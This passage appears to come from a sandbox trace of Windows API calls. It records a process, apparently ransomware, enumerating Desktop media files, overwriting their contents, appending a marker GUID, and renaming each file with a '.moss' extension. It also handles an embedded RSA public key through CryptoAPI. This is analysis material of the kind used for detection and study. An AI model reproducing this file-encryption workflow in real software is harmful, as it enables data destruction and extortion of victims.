dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.470] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.470] GetCurrentThreadId () returned 0x324 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd322d0 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.470] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.470] GetCurrentThreadId () returned 0x324 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.470] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.470] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.470] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.470] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.470] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.471] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.471] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe88 [0169.471] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.471] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbea0 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe70 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbeb8 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe88 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe88 | out: hHeap=0xcd0000) returned 1 [0169.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b4f158 [0169.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4f158 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbeb8 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbea0 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe70 | out: hHeap=0xcd0000) returned 1 [0169.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b455d8 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.475] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x692f, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb14*=0x692f, lpOverlapped=0x0) returned 1 [0169.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.478] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6934, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.478] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.478] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.478] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.478] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.478] CloseHandle (hObject=0x664) returned 1 [0169.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.480] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rHp2e.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rhp2e.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rHp2e.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rhp2e.wav.moss")) returned 1 [0169.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.481] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.483] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a06eff0, ftCreationTime.dwHighDateTime=0x1d5e09f, ftLastAccessTime.dwLowDateTime=0x3fb7df0, ftLastAccessTime.dwHighDateTime=0x1d5e724, ftLastWriteTime.dwLowDateTime=0x3fb7df0, ftLastWriteTime.dwHighDateTime=0x1d5e724, nFileSizeHigh=0x0, nFileSizeLow=0x6747, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TwHTsqQWbRTO.m4a", cAlternateFileName="TWHTSQ~1.M4A")) returned 1 [0169.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.483] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TwHTsqQWbRTO.m4a") returned=".m4a" [0169.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TwHTsqQWbRTO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\twhtsqqwbrto.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.483] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=26439) returned 1 [0169.483] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.487] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6721, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.487] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.488] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.488] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.488] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6747, lpOverlapped=0x0) returned 1 [0169.489] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.489] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.489] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.489] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.490] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.490] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.491] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.491] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.491] GetLastError () returned 0x0 [0169.491] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.491] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.491] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.491] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.491] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.491] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.491] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x6750) returned 0x3b48820 [0169.491] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.492] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.492] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6747, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.492] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.493] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.493] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.493] CloseHandle (hObject=0x664) returned 1 [0169.494] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TwHTsqQWbRTO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\twhtsqqwbrto.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TwHTsqQWbRTO.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\twhtsqqwbrto.m4a.moss")) returned 1 [0169.495] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 